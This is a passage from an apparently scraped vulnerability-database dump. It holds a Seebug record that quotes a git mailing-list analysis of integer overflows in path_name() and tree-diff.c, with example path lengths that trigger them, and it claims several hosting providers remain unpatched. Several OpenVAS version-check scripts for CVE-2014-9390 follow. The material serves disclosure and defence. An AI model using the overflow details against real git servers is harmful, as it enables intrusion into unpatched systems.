But I don't think that is the only problem with path_name(),\r\neven in the current version.\r\n\r\n> I'll repeat the code here (the version you posted was indented badly,\r\nand I had trouble reading it):\r\n\r\n```\r\n-- >8 --\r\nchar *path_name(const struct name_path *path, const char *name)\r\n{\r\n const struct name_path *p;\r\n char *n, *m;\r\n int nlen = strlen(name);\r\n int len = nlen + 1;\r\n\r\n for (p = path; p; p = p->up) {\r\n if (p->elem_len)\r\n len += p->elem_len + 1;\r\n }\r\n n = xmalloc(len);\r\n m = n + len - (nlen + 1);\r\n memcpy(m, name, nlen + 1);\r\n for (p = path; p; p = p->up) {\r\n if (p->elem_len) {\r\n m -= p->elem_len + 1;\r\n memcpy(m, p->elem, p->elem_len);\r\n m[p->elem_len] = '/';\r\n }\r\n }\r\n return n;\r\n}\r\n-- 8< --\r\n```\r\n> The problem you describe is one where the size of the allocation does\r\nnot match what strcpy would write. And that's kind-of fixed by moving to\r\nmemcpy() in 34fa79a6, because at least now the initial value of \"len\"\r\nmatches the number of bytes we write (so that number might be totally\r\nbogus, but we don't write more than we allocate).\r\n\r\n> But \"len\" can also change after the fact, due to the loop. If you have a\r\nsequence of path components, each less than 2^31, they can sum to a much\r\nsmaller positive value due to integer overflow (e.g., A/B/C with lengths\r\nA=2^31-5, B=2^31-5, C=20 would yield len=10). Then the buffer is too\r\nsmall to fit C, let alone all of the extra components we insert in the\r\nsecond loop.\r\n\r\n> The fix I came up with for this is to convert all of the \"int\" variables\r\nhere to \"size_t\". That doesn't actually _fix_ the problem at all, but\r\ndoes mean on a 64-bit system that you need a 2^64-long path to trigger\r\nit, which is impractical. 
But that doesn't help 32-bit systems (though\r\nin practice, I wouldn't be surprised if we barf long before that, as we\r\nwould be unable to hold the \"struct name_path\" list in memory).\r\n\r\n> Note that there is also a similar problem in tree-diff.c's\r\npath_appendnew(). There we build up the full pathname in a strbuf,\r\nwhich checks for overflow. But we then pass that length as an int and\r\nallocate a FLEX_ARRAY struct with it, which can end up too-small. This\r\none is the more interesting of the two, I think, as it triggers via\r\ngit-log, whereas the path_name() happens only during a repack (so it\r\nwill hit you _eventually_, but probably not as soon as you've cloned).\r\n\r\n> My solution there was similar: use size_t, which at least means you'd\r\nhave to allocate petabytes on a 64-bit system to trigger it (much less\r\non a 32-bit system, but _probably_ you'd be saved by malloc failing\r\nfirst).\r\n\r\n> And that's why I dragged my feet on sending those fixes upstream; I\r\ndon't think they're complete. The complete fix would be to use size_t\r\nconsistently to store return values for strlen(), and to do integer\r\noverflow checks whenever we do computations on size_t.\r\n\r\n> Those of you on this list may recall I posted a series for the latter\r\nlast year, but it was somewhat invasive. It may be worth resurrecting.\r\n\r\n> I think we could also get rid of path_name() entirely. The sole purpose\r\nat this point is to compute the name-hash for pack-objects, which could\r\nbe done by walking the name_path list rather than re-constructing the\r\nwhole thing in memory.\r\n\r\n> -Peff\r\n\r\nOf course everything Peff talked about above is now fixed in git 2.7.1 with the removal of path_name() and the size_t/overflow check in tree-diff.c. It was even fixed earlier for users of github enterprise. However, several months after the last message on this thread, I\u2019m not aware of any Linux distribution that issued a fix for their stable branch. 
Last week I could contact wikimedia so they could fix their gerrit\u2011gc server. Bitbucket, GitLab still suffer from that issue (they even use a git version before git/commit/34fa79a6cde56d6d428ab0d3160cb094ebad3305 which is the easiest one to trigger because of strcpy() instead of memcpy() ). While it seems normal the \u1d04\u1d20\u1d07 details are still unpublished, I definitely can\u2019t deal with every major provider.\r\n\r\nPeople surely remember https://www.google.fr/search?tbm=nws&q=cve-2014-9390 breaking the news about a similar issue in that software (which allowed most distros to fix it quickly). It seems while this threat is more widespread, it definitely lacks advertisement.\r\nSo some people suggested that I post about it here.", "published": "2016-03-16T00:00:00", "type": "seebug", "title": "Git \u7248\u672c<=2.7.1 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-9390"], "modified": "2016-03-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-91042", "id": "SSV:91042", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2020-03-02T20:53:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "description": "The remote host is missing an update for the ", "modified": "2020-02-28T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868647", "type": "openvas", "title": "Fedora Update for eclipse-jgit FEDORA-2014-17341", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for eclipse-jgit FEDORA-2014-17341\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General 
Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868647\");\n script_version(\"2020-02-28T09:03:19+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 09:03:19 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:38:42 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-9390\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for eclipse-jgit FEDORA-2014-17341\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'eclipse-jgit'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"eclipse-jgit on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17341\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147193.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n 
script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"eclipse-jgit\", rpm:\"eclipse-jgit~3.5.3~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-02T20:51:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "description": "Gentoo Linux Local Security Checks GLSA 201509-06", "modified": "2020-02-28T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121412", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121412", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201509-06", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (C) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121412\");\n script_version(\"2020-02-28T09:03:19+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:29:03 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 09:03:19 +0000 (Fri, 28 Feb 2020)\");\n script_name(\"Gentoo Security Advisory GLSA 201509-06\");\n script_tag(name:\"insight\", value:\"A vulnerability in Git causing Git-compatible clients that access case-insensitive or case-normalizing filesystems to overwrite the .git/config when cloning or checking out a repository, leading to execution of arbitrary commands.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201509-06\");\n script_cve_id(\"CVE-2014-9390\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201509-06\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"dev-vcs/git\", unaffected: make_list(\"ge 
1.8.5.6\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-vcs/git\", unaffected: make_list(\"ge 1.9.5\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-vcs/git\", unaffected: make_list(\"ge 2.0.5\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-vcs/git\", unaffected: make_list(), vulnerable: make_list(\"lt 2.0.5\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-02T20:53:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "description": "Mageia Linux Local Security Checks mgasa-2015-0325", "modified": "2020-02-28T00:00:00", "published": "2015-10-15T00:00:00", "id": "OPENVAS:1361412562310130059", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130059", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0325", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (C) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130059\");\n script_version(\"2020-02-28T09:03:19+0000\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:42:10 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 09:03:19 +0000 (Fri, 28 Feb 2020)\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0325\");\n script_tag(name:\"insight\", value:\"cgit in Mageia 4/5 bundles an old git that is being subject to a minor security issue (CVE-2014-9390). The cgit package was updated to its latest upstream release, and updates the bundled git to the non-vulnerable version 2.5.0, which contains various bug fixes.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0325.html\");\n script_cve_id(\"CVE-2014-9390\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0325\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"cgit\", rpm:\"cgit~0.11.2~1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-02T20:52:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "description": "The remote host is missing an update for the ", "modified": "2020-02-28T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868829", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868829", "type": "openvas", "title": "Fedora Update for eclipse-egit FEDORA-2014-17341", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for eclipse-egit FEDORA-2014-17341\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868829\");\n script_version(\"2020-02-28T09:03:19+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 09:03:19 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:56:55 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-9390\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for eclipse-egit FEDORA-2014-17341\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'eclipse-egit'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"eclipse-egit on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17341\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147192.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"eclipse-egit\", rpm:\"eclipse-egit~3.5.3~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-02T20:51:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "description": "The remote host is missing an update for the ", "modified": "2020-02-28T00:00:00", "published": "2015-01-23T00:00:00", "id": "OPENVAS:1361412562310842045", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842045", "type": "openvas", "title": "Ubuntu Update for git USN-2470-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for git USN-2470-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842045\");\n script_version(\"2020-02-28T09:03:19+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 09:03:19 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-01-23 12:58:04 +0100 (Fri, 23 Jan 2015)\");\n script_cve_id(\"CVE-2014-9390\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for git USN-2470-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Matt Mackall and Augie Fackler discovered that\nGit incorrectly handled certain filesystem paths. A remote attacker could possibly\nuse this issue to execute arbitrary code if the Git tree is stored in an HFS+ or NTFS\nfilesystem. 
The remote attacker would need write access to a Git repository that the\nvictim pulls from.\");\n script_tag(name:\"affected\", value:\"git on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2470-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2470-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:2.1.0-1ubuntu0.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:1.9.1-1ubuntu0.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:1.7.9.5-1ubuntu0.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:53:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9462", "CVE-2014-9390"], "description": "Jesse Hertz of Matasano Security\ndiscovered that Mercurial, a 
distributed version control system, is prone to a\ncommand injection vulnerability via a crafted repository name in a clone\ncommand.", "modified": "2017-07-07T00:00:00", "published": "2015-05-11T00:00:00", "id": "OPENVAS:703257", "href": "http://plugins.openvas.org/nasl.php?oid=703257", "type": "openvas", "title": "Debian Security Advisory DSA 3257-1 (mercurial - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3257.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3257-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703257);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2014-9390\", \"CVE-2014-9462\");\n script_name(\"Debian Security Advisory DSA 3257-1 (mercurial - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-05-11 00:00:00 +0200 (Mon, 11 May 2015)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3257.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"mercurial on Debian Linux\");\n script_tag(name: \"insight\", value: \"Mercurial is a fast, lightweight\nSource Control Management system designed for efficient handling of very large\ndistributed projects.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 2.2.2-4+deb7u1. 
This update also includes\na fix for CVE-2014-9390\npreviously scheduled for the next wheezy point release.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 3.1.2-2+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.4-1.\n\nWe recommend that you upgrade your mercurial packages.\");\n script_tag(name: \"summary\", value: \"Jesse Hertz of Matasano Security\ndiscovered that Mercurial, a distributed version control system, is prone to a\ncommand injection vulnerability via a crafted repository name in a clone\ncommand.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mercurial\", ver:\"2.2.2-4+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mercurial-common\", ver:\"2.2.2-4+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-03-02T20:53:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9462", "CVE-2014-9390"], "description": "Jesse Hertz of Matasano Security\ndiscovered that Mercurial, a distributed version control system, is prone to a\ncommand injection vulnerability via a crafted repository name in a clone\ncommand.", "modified": "2020-02-28T00:00:00", "published": "2015-05-11T00:00:00", "id": "OPENVAS:1361412562310703257", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703257", "type": "openvas", "title": "Debian Security Advisory DSA 3257-1 (mercurial - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# Auto-generated from advisory DSA 3257-1 
using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703257\");\n script_version(\"2020-02-28T09:03:19+0000\");\n script_cve_id(\"CVE-2014-9390\", \"CVE-2014-9462\");\n script_name(\"Debian Security Advisory DSA 3257-1 (mercurial - security update)\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 09:03:19 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-05-11 00:00:00 +0200 (Mon, 11 May 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3257.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"mercurial on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 2.2.2-4+deb7u1. This update also includes\na fix for CVE-2014-9390\npreviously scheduled for the next wheezy point release.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 3.1.2-2+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.4-1.\n\nWe recommend that you upgrade your mercurial packages.\");\n script_tag(name:\"summary\", value:\"Jesse Hertz of Matasano Security\ndiscovered that Mercurial, a distributed version control system, is prone to a\ncommand injection vulnerability via a crafted repository name in a clone\ncommand.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"mercurial\", ver:\"2.2.2-4+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mercurial-common\", ver:\"2.2.2-4+deb7u1\", 